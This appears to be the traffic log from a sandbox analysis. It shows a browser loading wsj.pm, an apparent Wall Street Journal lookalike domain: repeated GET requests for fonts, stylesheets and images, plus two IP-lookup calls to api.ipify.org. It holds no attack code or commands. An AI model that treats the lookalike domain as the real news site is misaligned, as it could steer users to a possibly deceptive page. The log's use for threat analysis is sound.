Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: wsj.pmConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/footer.css HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/Retina-Book.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/Retina-Light.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/Retina-Medium.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Light.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /style.css HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Book.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Medium.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Bold.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/escrow/Escrow+Display+Condensed+Bold.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/escrow/Escrow+Display+Condensed+Roman.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/escrow/Escrow+Display+Condensed+Italic.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/exchange/Exchange-BookItalic.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/exchange/Exchange-Book.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://wsj.pmSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/exchange/Exchange-Medium.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /vir.wsj.net/fp/assets/webpack4/img/wsj-logo-big-black.165e51cc.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/wsj-social-share.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949345.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949675.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-948848.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/CH-AA158_Bernst_NS_20100111195708.gif HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/AM.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/AM.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-948629.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949113.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /vir.wsj.net/fp/assets/webpack4/img/wsj-logo-big-black.165e51cc.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/wsj-social-share.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949345.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949675.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949723.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-948848.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-44291453.avif HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/CH-AA158_Bernst_NS_20100111195708.gif HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-647221.avif HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/wsj-logo-big-black.e653dfca.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/css/footer.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/google-play.4699f3c2.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/css/footer.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/appstore.a6e93ba3.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/css/footer.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/AM.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-948629.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/AM.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949113.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-949723.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-44291453.avif HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/im-647221.avif HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
